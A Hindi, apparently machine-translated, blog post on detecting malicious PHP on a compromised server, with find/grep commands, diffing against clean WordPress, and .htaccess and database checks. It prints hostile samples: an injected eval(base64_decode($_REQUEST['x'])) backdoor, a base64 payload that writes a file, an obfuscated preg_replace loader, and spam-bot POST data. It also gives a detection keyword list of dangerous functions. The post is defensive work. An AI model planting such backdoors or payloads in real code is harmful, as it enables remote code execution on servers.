कैसे पता करें कि आपकी PHP साइट हैक हो गई है

मेरे मित्र की साइट हाल ही में हैक हुई थी, उस पर IP.Bard का एक पुराना संस्करण लॉन्च किया गया था, जिसमें एक स्थानीय फ़ाइल शामिल करने की भेद्यता है। यह पोस्ट IP.Bard या अन्य php कोड के लिए समर्पित नहीं होगी, यह दिखाएगा कि अपने सर्वर पर संभावित रूप से दुर्भावनापूर्ण php कोड कैसे खोजा जाए। अंत में, मैं एक उदाहरण दिखाऊंगा कि हमलावर हैक की गई साइट पर क्या अपलोड कर सकते हैं।

एक्सेस लॉग की जाँच करें

किसी चीज़ से शुरू करने के लिए, मैं अपने मित्र की हैक की गई साइट के एक्सेस लॉग से कुछ प्रविष्टियाँ साझा करना चाहता हूँ।

IpreMOVED - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0" IpreMOVED - - [01/Mar/2013:06:12:58 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0" 

आपको अक्सर सर्वर पर पहुंच लॉग की जांच करनी चाहिए, लेकिन अगर आप सावधान नहीं हैं, तो URL जैसे कि पहली नज़र में हानिरहित दिखने वाले आपके ठीक पीछे जा सकते हैं।

ऊपर की दो फाइलें पटाखा द्वारा डाउनलोड की गई स्क्रिप्ट हैं; उन्हें वहां कैसे मिली, बड़ी भूमिका नहीं निभाती है, क्योंकि किसी भी दो सर्वर पर कोड शायद अलग होगा। हालांकि, इस विशेष उदाहरण में, IP.Bard के एक पुराने संस्करण में भेद्यता का शोषण किया गया था, और हमलावर अपनी स्क्रिप्ट को लिखने योग्य निर्देशिकाओं में जोड़ने में सक्षम थे, जैसे कि कस्टम डाउनलोड निर्देशिका और एक निर्देशिका जिसमें IP.Board त्वचा की छायांकित छवियों को संग्रहीत करता है। । यह एक सामान्य हमला वेक्टर है, बहुत से लोग इन निर्देशिकाओं के अधिकारों को 777 में बदल देते हैं या उन्हें एक्सेस लिख देते हैं, इस पर बाद में।

चलो उपरोक्त लॉग लाइनों पर एक करीब से नज़र डालें, कुछ भी आपको नहीं पकड़ता है?

ध्यान दें कि एक्सेस लॉग POST अनुरोधों में, GET अनुरोधों पर नहीं।
सबसे अधिक संभावना है, हमलावर एक्सेस लॉग को अधिक असंगत बनाना चाहते थे, क्योंकि अधिकांश लॉग पोस्ट डेटा को सहेजते नहीं हैं।

दुर्भावनापूर्ण PHP फ़ाइलों का पता लगाना

आपके सर्वर पर संदिग्ध php फ़ाइलों की पहचान करने के कई तरीके हैं, यहाँ सबसे अच्छे हैं।
संकेत: अपनी साइट की रूट डायरेक्टरी से इन कमांड को चलाएं।

हाल ही में संशोधित PHP फ़ाइलों के लिए खोजें

चलो एक साधारण से शुरू करते हैं, मान लें कि आपने कुछ समय के लिए php कोड में कोई बदलाव नहीं किया है, अगली कमांड वर्तमान निर्देशिका ट्री में सभी php फ़ाइलों के लिए दिखती है जो पिछले सप्ताह में बदल गए हैं। आप माइम विकल्प को इच्छानुसार बदल सकते हैं, उदाहरण के लिए दो सप्ताह के भीतर माइम -14।

 find . -type f -name '*.php' -mtime -7 

मेरा हैक किया गया सर्वर निम्नलिखित परिणाम लौटाता है:

 ./uploads/monthly_04_2008/index.php ./uploads/monthly_10_2008/index.php ./uploads/monthly_08_2009/template.php ./uploads/monthly_02_2013/index.php 

इन सभी लिपियों को हमलावर द्वारा उपयोगकर्ता की डाउनलोड निर्देशिका में अपलोड किया गया था।
नोट: यदि आप स्वयं किसी निश्चित समय में php फ़ाइलों को संशोधित करते हैं तो यह आदेश गलत परिणाम देगा। निम्नलिखित विधियाँ अधिक प्रभावी हैं।

सभी PHP फ़ाइलों को संदिग्ध कोड के साथ खोजें।

यह सबसे अच्छे दृष्टिकोण से बहुत दूर है, निम्न टीम php फाइलों की तलाश कर रही हैं जिनमें हमलावर स्क्रिप्ट हैं। हम सरल शुरुआत करेंगे और उन्नत खोज के साथ अधिक प्राप्त करेंगे।

पहली फ़ाइल की जाँच जिसमें eval, base64_decode, gzinflate या str_rot13 शामिल हैं।

 find . -type f -name '*.php' | xargs grep -l "eval *(" --color find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color 

संकेत: पहला खोज पैरामीटर खोज निर्देशिका है, बिंदु का अर्थ है वर्तमान निर्देशिका (और सभी उपनिर्देशिकाएं)। आप इस पैरामीटर को खोज परिणामों को कम करने के लिए किसी भी मौजूदा निर्देशिका नाम में बदल सकते हैं, उदाहरण के लिए:

 find wp-admin -type f -name '*.php' | xargs grep -l "gzinflate *(" --color 

यदि आप -l विकल्प को grep से हटाते हैं, तो यह मिलान की गई फ़ाइल का पाठ दिखाएगा। आगे जाने के लिए मैं इस संयुक्त टीम का लाभ उठाऊंगा, जो अधिक सामान्य है

 find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color 

इस कमांड में evp युक्त फाइलें मिलेंगी (str_rot13 (base64_decode) -
Grep सिंटैक्स बहुत सरल है और आप इसे अपनी आवश्यकताओं के अनुरूप बदल सकते हैं। उपरोक्त अभिव्यक्ति पर एक नज़र डालें, जिसे हम ढूंढ रहे हैं, यह "eval * (str_rot13 * (base64_decode *) (" है)
एक अंतरिक्ष के बाद * शून्य या अधिक अंतरिक्ष वर्ण इंगित करता है। उपरोक्त अभिव्यक्ति निम्नलिखित पंक्तियों के लिए मान्य होगी:

 eval(str_rot13(base64_decode eval( str_rot13( base64_decode eval( str_rot13( base64_decode 

युक्ति: ऐसे कार्यों की तलाश करने के लिए अभिव्यक्ति का विस्तार करें, जिन्हें दुर्भावनापूर्ण रूप से उपयोग किया जा सकता है, जैसे मेल, फ़ॉस्कोपेन, pfsockopen, stream_socket_client, exec, system और passthru। आप इन सभी मूल्यों को एक कमांड में जोड़ सकते हैं:

 find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *\(" 

नोट: हम egrep का उपयोग करते हैं, grep का नहीं, यह हमें विस्तारित नियमित अभिव्यक्तियों का उपयोग करने की अनुमति देता है।
अंत में, यहां कोड छिपाने के लिए समान रूप से प्रसिद्ध तरीका है:

 preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQ FILE GOES ON FOR A LONG TIME...... lnSELWEZJakW9R3f7+J+uYuFiiC318gZ9P8C'\x29\x29\x29\x3B","."); 

ई संशोधक के साथ preg_replace इस कोड को निष्पादित करेगा, यह असामान्य दिखता है, हालांकि यह बस बेस 64 php संपीड़ित कोड है जो कुछ हेक्साडेसिमल वर्ण कोड का उपयोग करता है।
\ x65 \ x76 \ x61 \ x6C \ x28 \ x7A \ x69 \ x6E \ x66C \ x6C \ x61 \ x74 \ x 64 \ x28 \ x61 \ x61 \ x73 \ x65 \ x36 \ x34 \ x5F \ x64 \ x65 \ x65 \ x६६ \ x6F \ x64 \ x65 \ x28 eval (gzinflate (base64_decode ( , और \ x29 \ x29 \ x29 \ x3B, जैसे )) के रूप में अनुवाद करता है );

यह कमांड आपको preg_replace का उपयोग खोजने में मदद करेगी:

 find . -type f -name '*.php' | xargs egrep -i "preg_replace *\((['|\"])(.).*\2[az]*e[^\1]*\1 *," --color 

युक्ति: यदि आपको इस आदेश के परिणामों का एक टन मिलता है, तो आप परिणाम को एक फ़ाइल में सहेज सकते हैं या उन्हें किसी अन्य प्रोग्राम पर पुनर्निर्देशित कर सकते हैं जिसे कम कहा जाता है , जो आपको एक समय में परिणाम एक पृष्ठ देखने की अनुमति देता है। F कुंजी स्क्रॉलिंग के लिए जिम्मेदार है, q कुंजी बाहर निकलने के लिए है।

 find . -type f -name '*.php' | xargs grep base64_ | less find . -type f -name '*.php' | xargs grep base64_ > results.txt 

उपरोक्त किसी भी खोज आदेश के साथ, आप ऐसा ही कर सकते हैं।

युक्ति: हेक्साडेसिमल x29 को आखिर में देखा? यह समापन ब्रैकेट है, और x3B एक अर्धविराम है। आप इसे चलाकर सत्यापित कर सकते हैं:

 echo chr(hexdec('x29')); echo chr(hexdec('x3B')); // outputs ); 

आप आगे सत्यापन के लिए php फ़ाइलों में इन हेक्स कोड की खोज के लिए खोज का उपयोग कर सकते हैं।

 find . -type f -name '*.php' | xargs grep -il x29 

यह एक अच्छा तरीका है यदि आप जानते हैं कि आप कोड में हेक्साडेसिमल मान का उपयोग नहीं कर रहे हैं।

हम तथ्यों का उल्लेख करते हैं

अधिकांश विधियाँ यह मानती हैं कि हमलावर उत्तर में फाइलें अपलोड करता है और कोड ऑबफ्यूजेशन के कुछ प्रकार का उपयोग करता है, जब अन्य हमलावर केवल मौजूदा php कोड को संशोधित कर सकते हैं। इस स्थिति में, कोड प्राकृतिक दिख सकता है और मौजूदा स्क्रिप्ट की शैली से मेल खा सकता है, या यह भ्रामक हो सकता है।

इस समस्या को हल करने के लिए, आपको अपने कोड की एक साफ प्रतिलिपि की आवश्यकता होती है यदि आप व्यापक php स्क्रिप्ट्स का उपयोग करते हैं, जैसे कि वर्डप्रेस, vbulletin, IP.Board, आदि। - सब कुछ तैयार है। यदि नहीं, तो मुझे आशा है कि आप git या अन्य संस्करण नियंत्रण प्रणालियों का उपयोग करेंगे और आप अपने कोड का एक स्वच्छ संस्करण प्राप्त कर सकते हैं।

इस उदाहरण के लिए, मैं वर्डप्रेस का उपयोग करूंगा।

मेरे पास दो वर्डप्रेस-क्लीन फ़ोल्डर हैं, जिसमें वर्डप्रेस और वर्डप्रेस-कॉम्प्रोमाइज्ड की बस डाउनलोड की गई कॉपी है, जिसमें फाइलों में कहीं भी खतरा है।

 drwxr-xr-x 4 greg greg 4096 Mar 2 15:59 . drwxr-xr-x 4 greg greg 4096 Mar 2 15:59 .. drwxr-xr-x 5 greg greg 4096 Jan 24 15:53 wordpress-clean drwxr-xr-x 5 greg greg 4096 Jan 24 15:53 wordpress-compromised 

मैं कमांड चलाकर अपने स्थापित वर्डप्रेस और शुद्ध वर्डप्रेस के बीच अंतर पा सकता हूं:

 diff -r wordpress-clean/ wordpress-compromised/ -x wp-content 

मैंने इस खोज से wp-content को बाहर कर दिया है, क्योंकि हर किसी की अपनी थीम और प्लगइन्स हैं।
युक्ति: सुनिश्चित करें कि आप तुलना के लिए वर्डप्रेस के एक ही संस्करण का उपयोग करते हैं।

यहाँ मेरी खोज के परिणाम हैं:

 diff -r -x wp-content wordpress-clean/wp-admin/includes/class-wp-importer.php wordpress-compromised/wp-admin/includes/class-wp-importer.php 302a303,306 > > if (isset($_REQUEST['x'])) { > eval(base64_decode($_REQUEST['x'])); > } 

उसने दुर्भावनापूर्ण कोड का पता लगाया है!

जिज्ञासा से बाहर ...

कोड की इन 3 पंक्तियों के साथ एक हमलावर क्या कर सकता है? सबसे पहले, एक हमलावर को उपयोगी जानकारी मिलेगी:

 $payload = "file_put_contents(\"../../wp-content/uploads/wp-upload.php\", \"<?php\nphpinfo();\");"; echo base64_encode($payload); // output: ZmlsZV9wdXRfY29udGVudHMoIi4uLy4uL3dwLWNvbnRlbnQvdXBsb2Fkcy93cC11cGxvYWQucGhwIiwgIjw/cGhwCnBocGluZm8oKTsiKTs= 

इसके बाद वह http: / /YSSITE/wp-admin/includes/class-wp-importer.php पर एक GET या POST अनुरोध भेजेगा, जिसमें ऊपर लिखी स्क्रिप्ट युक्त पैरामीटर x होगा। इसके निष्पादन के परिणामस्वरूप, फ़ाइल /wp-content/uploads/wp-upload.php बनाई जाएगी, जो आपके सर्वर के बारे में जानकारी प्रदर्शित करती है। यह बुरा नहीं लगता है, लेकिन तथ्य यह है कि एक हमलावर किसी भी php कोड को चला सकता है जो वह चाहता है।
नोट: यह केवल तभी काम करेगा जब wp-content / uploads directory लेखन योग्य हो। लगभग हमेशा, वेब सर्वर की सेटिंग्स के आधार पर, आप अन्य फ़ाइलों के लिए पठन / लेखन अनुमतियाँ बदल सकते हैं।

हमेशा निष्पादन योग्य कोड डाउनलोड करने के लिए उपलब्ध निर्देशिकाओं की तलाश करें।

ऊपर प्रस्तुत तरीकों का उपयोग करके, अपने बूट निर्देशिका में php कोड ढूंढना आसान है। Wordpress के लिए, यह होगा:

 find wp-content/uploads -type f -name '*.php' 

युक्ति: यहां एक बहुत ही सरल बैश स्क्रिप्ट है जो निर्देशिकाओं को लिखने योग्य और उनमें php फ़ाइलों के लिए दिखता है। परिणाम results.txt फ़ाइल में सहेजा जाएगा। स्क्रिप्ट पुनरावर्ती रूप से काम करती है।

 #!/bin/bash search_dir=$(pwd) writable_dirs=$(find $search_dir -type d -perm 0777) for dir in $writable_dirs do #echo $dir find $dir -type f -name '*.php' done 

फ़ाइल का नाम खोजें_for_php_in_writable और इसे निष्पादित अधिकार दें

 chmod +x search_for_php_in_writable 

इस फ़ाइल को अपने होम डायरेक्टरी में सेव करें, और फिर उस डायरेक्टरी पर जाएँ जिसमें आप सर्च करके निम्नलिखित कमांड को चलाने जा रहे हैं:

 ~/search_for_php_in_writable > results.txt ~/search_for_php_in_writable | less 

नोट: यदि आपकी साइट को साझा होस्टिंग पर होस्ट किया गया है और वेब सर्वर सुरक्षित रूप से कॉन्फ़िगर नहीं किया गया है, तो हो सकता है कि आपकी साइट पर हमला करने का एकमात्र कारण न हो। कमजोर साइटों पर php शेल की सामान्य लोडिंग अनिवार्य रूप से एक उपकरण है जो एक हमलावर को एक फ़ाइल ब्राउज़र देता है। वे इस उपकरण का उपयोग कर सकते हैं जो सर्वर पर सभी लिपियों पर हमला करने वाली लिपियों को डाउनलोड करने के लिए, जो कि उपयुक्त हैं, उदाहरण के लिए, डाउनलोड निर्देशिका।
नोट: पटाखे आमतौर पर उन चित्रों को डाउनलोड करने का प्रयास करते हैं जिनमें php कोड होता है, इसलिए ऊपर सूचीबद्ध विधियों का उपयोग करके अन्य एक्सटेंशन की जांच करें।

 find wp-content/uploads -type f | xargs grep -i php find wp-content/uploads -type f -iname '*.jpg' | xargs grep -i php 

विश्वास नहीं होता? इस फाइल को हैक की गई साइट पर jpg इमेज के रूप में अपलोड किया गया था। ऐसा लगता है कि यह बाइनरी डेटा के लिए गलत था। यहाँ एक और अधिक "पठनीय" प्रारूप में एक ही फाइल है।

अभी भी नहीं पढ़ सकते हैं? मेरे लिए एक गहरी जाँच की तरह। यह सब कोड इस फ़ंक्शन को चलाने के लिए डिज़ाइन किया गया है:

 if(!defined('FROM_IPB') && !function_exists("shutdownCallback") and @$_SERVER["HTTP_A"]=="b") { function shutdownCallback() { echo "<!--".md5("links")."-->"; } register_shutdown_function("shutdownCallback"); } 

इस लिपि को अप्रासंगिक बना देता है, आपको सीखना चाहिए, आपको अपनी बूट निर्देशिकाओं को जांचना होगा।
यदि आप रुचि रखते हैं, तो यह केवल एक परीक्षण परिदृश्य है कि नोड असुरक्षित है या नहीं, यह देखने के लिए हमला बाद में हुआ।

दुर्भावनापूर्ण कोड और कहां छिपाया जा सकता है?

यदि आपका php कोड गतिशील रूप से पृष्ठ सामग्री उत्पन्न करता है और आपकी साइट हैक हो गई है, तो एक हमलावर डेटाबेस में दुर्भावनापूर्ण कोड लिख सकता है। आप अधिक गहन जांच भी कर सकते हैं।

पृष्ठ लोड करने के बाद अपनी साइट पर जाएं, इसके स्रोत HTML कोड को देखें और इसे अपने कंप्यूटर पर कहीं सहेजें, उदाहरण के लिए mywebsite.txt; निम्न आदेश चलाएँ

 grep -i '<iframe' mywebsite.txt 

हैकर्स अक्सर हैक की गई साइटों पर आइफ्रेम डालते हैं, साइट पर सभी पृष्ठों की जांच करते हैं!
युक्ति: अपने संसाधन की HTML सामग्री को देखने के लिए फ़ायरफ़ॉक्स के लिए फ़ायरबग एक्सटेंशन का उपयोग करें, एक हमलावर आइफ्रेम बनाने के लिए javascipt का उपयोग कर सकता है, ब्राउज़र में पृष्ठ के स्रोत कोड को देखते समय उन्हें प्रदर्शित नहीं किया जाएगा, क्योंकि DOM पृष्ठ लोड होने के बाद बदलता है। फ़ायरफ़ॉक्स के लिए एक लाइव HTTP हेडर एक्सटेंशन भी है जो आपके पेज पर सभी वर्तमान अनुरोधों को दिखाएगा। इससे वेब अनुरोधों को देखना आसान हो जाएगा, जो नहीं होना चाहिए।

डेटाबेस खोजें

शायद हमलावर ने डेटाबेस में कोड जोड़ा। यह तभी होगा जब आपका स्क्रिप्ट डेटाबेस में उपयोगकर्ता कोड, जैसे प्लगइन्स को संग्रहीत करेगा। तो vBulletin करता है। हालांकि यह दुर्लभ है, आपको यह जानना चाहिए। यदि आपको इस मामले में हैक किया गया था, तो हमलावर को आपकी साइट पर डेटा प्रदर्शित करने वाली तालिकाओं में एक आइफ्रेम डालने की संभावना है।

इस उदाहरण में, हम mysql या इसके डेरिवेटिव का उपयोग करेंगे।

ऐसा करने के लिए, मैं PHPMyAdmin का उपयोग करना चाहूंगा और यह मेरे लिए सामान्य नहीं है, मैं कमांड लाइन टूल का उपयोग करना पसंद करता हूं, वे कोड में उपलब्ध हैं, लेकिन यह टूल खोज के लिए सुविधाजनक है।

व्यक्तिगत रूप से, मैं उत्पादन सर्वर पर PHPMyAdmin नहीं चलाता हूं, मैं डेटाबेस की एक प्रति डाउनलोड करता हूं और इसे स्थानीय सर्वर पर चलाता हूं। यदि डेटाबेस बड़ा है, तो उत्पादन सर्वर पर पाठ के छोटे टुकड़ों की खोज करने की अनुशंसा नहीं की जाती है।

PHPMyAdmin डेटाबेस खोलें और 'खोज' पर क्लिक करें। आप% base64_% और% eval (%, और किसी भी अन्य संयोजनों जैसे स्ट्रिंग्स की खोज कर सकते हैं जिन्हें मैंने पहले ही रेखांकित किया है।

यदि आप Apache का उपयोग कर रहे हैं तो .htaccess फ़ाइलों की जाँच करें

यदि आप Apache वेब सर्वर का उपयोग कर रहे हैं, तो संदिग्ध परिवर्तनों के लिए .htaccess फ़ाइलों की जाँच करें।

auto_append_file और auto_prepend_file में सभी php स्क्रिप्ट की शुरुआत या अंत में अन्य php फाइलें शामिल हैं, हमलावर उनका कोड शामिल करने के लिए उनका उपयोग कर सकते हैं।

 find . -type f -name '\.htaccess' | xargs grep -i auto_prepend_file; find . -type f -name '\.htaccess' | xargs grep -i auto_append_file; 

निम्न आदेश .htacess फ़ाइलों के लिए सभी उपनिर्देशिकाओं में दिखता है जिनमें 'http' होता है। खोज का परिणाम सभी पुनर्निर्देशन नियमों की एक सूची होगी, जिसमें दुर्भावनापूर्ण नियम शामिल हो सकते हैं।

 find . -type f -name '\.htaccess' | xargs grep -i http; 

कुछ दुर्भावनापूर्ण रीडायरेक्ट उपयोगकर्ता एजेंट पर आधारित होते हैं। HTTP_USER_AGENT इन .htaccess फ़ाइलों का उपयोग करना अच्छा लगेगा। पिछले आदेशों को आसानी से बदला जा सकता है, बस अर्धविराम से पहले खोजशब्द बदलें।

अतिरिक्त सुरक्षा के लिए, यदि आप निर्देशिकाओं में .htaccess के उपयोग को अक्षम कर सकते हैं और अपने विन्यास को मुख्य अपाचे विन्यास में स्थानांतरित कर सकते हैं।

"वास्तविक दुनिया" में

तो लोग आपकी साइट को हैक क्यों करना चाहते हैं, उनके लिए इसका क्या मतलब है? कुछ के लिए, यह एक शौक है, लेकिन दूसरों के लिए, आय का एक स्रोत है।

यहाँ एक हैकिंग साइट पर अपलोड की गई स्क्रिप्ट का एक उदाहरण है । यह पूरी तरह से पोस्ट ऑपरेशन पर आधारित है, इस मामले में अधिकांश वेब सर्वर लॉग बेकार होंगे। मैं पोस्ट अनुरोधों के लॉग प्राप्त करने में सक्षम था:

 Array ( [lsRiY] => YGFsZWN2bXBCY21uLGFtbw== [eIHSE] => PNxsDhxNdV [mFgSo] => b2NrbmtsLzIwLG96LGNtbixhbW8= [dsByW] => PldRR1A8Y3BhamtnXWprYWlxPi1XUUdQPAg+TENPRzwgQ3BhamtnIkprYWlxID4tTENPRzwIPlFX QEg8RFU4IlRoImNlcGMiMywiMjIiQWgiY25rcSIwLCIyMj4tUVdASDwiCD5RQE1GWzwIPkA8CD5m a3Q8PmMianBnZD8ganZ2cjgtLWhndnh4aW5rYWlnbCxhbW8tdXIva2xhbndmZ3EtUWtvcm5nUmtn LUZnYW1mZy1KVk9OLW5rYCxyanIgPFRoImNlcGMiMywiMjIiQWgiY25rcSIwLCIyMj4tYzw+LWZr dDwIPi1APAg+cjxqY3JyZ2wuImNsZiJ1amdsInZqZyJgbXsicGdjYWpnZiJjZWNrbCJrbHZtInZq ZyJ2bXsiYG16IksiZG13bGYib3txZ25kIkxndGdwImpnY3BmIm1kImt2LHZqZyIicmptdm1lcGNy anEibWQidmpnImNwdmtkY2F2InZqY3YidWcidWdwZyJubW1pa2xlImRtcCIiY2xmIiJyY3FxZ2Yi UnducWciImVtbWYuImpnInFja2YuImlsZ2dua2xlImBncWtmZyJtd3AiZHBrZ2xmLCJKZyJqY3Ei InZjaWdsIiI+LXI8CD4tUUBNRls8CA== [GGhp] => a3ZAbFFTSlJSbFo= [AIQXa] => e3VWT2VvQ0hyS0ha ) 

दुर्भावनापूर्ण स्क्रिप्ट मूल रूप से एक स्पैम ज़ोंबी है जो किसी को भी ईमेल भेजेगा जो आपके सर्वर का उपयोग डाक अनुरोध के माध्यम से ईमेल भेजने के लिए करेगा। प्रत्येक पोस्ट अनुरोध में कुंजियाँ बदल सकती हैं और स्क्रिप्ट बहुत संसाधनपूर्ण है, यह स्थापित कार्यों की जांच करती है और इसके लिए अनुकूलन करती है। उदाहरण के लिए, यदि php मेल () अनुपलब्ध है, तो यह 25 पोर्ट पर एक सॉकेट बनाने और सीधे SMTP के माध्यम से ईमेल भेजने का प्रयास करेगा।

यदि आप घुसपैठियों के डेटा को डिक्रिप्ट करने में रुचि रखते हैं, तो n9a2d8ce3 नामक फ़ंक्शन का उपयोग करें। मिस्टीरियस POST डेटा एफिक्स डेस्टिनेशन एड्रेस और ई-मेल कंटेंट।

यदि आप इस लेख में दी गई सलाह का उपयोग करते हैं, तो आप आसानी से इस तरह की स्क्रिप्ट पा सकते हैं।

निष्कर्ष

यदि आप वर्डप्रेस जैसी सार्वजनिक php स्क्रिप्ट का उपयोग करते हैं, तो न केवल मूल स्थापना के लिए महत्वपूर्ण और सुरक्षा अपडेट पर ध्यान दें, बल्कि प्लगइन्स जैसे एक्सटेंशन के लिए भी। अधिकांश हमलावर ज्ञात कमजोरियों वाले हजारों साइटों को खोजने का प्रयास करेंगे, इसलिए यदि आप कमजोर हैं, तो वे अंततः आपको पाएंगे।

यदि आप एक वाचा पर काम कर रहे हैं, तो सभी समान, आपको लगातार कोड की जांच करने की आवश्यकता है, क्योंकि आपके द्वारा उपयोग किए जाने वाले पुस्तकालयों में कमजोरियां नहीं होनी चाहिए।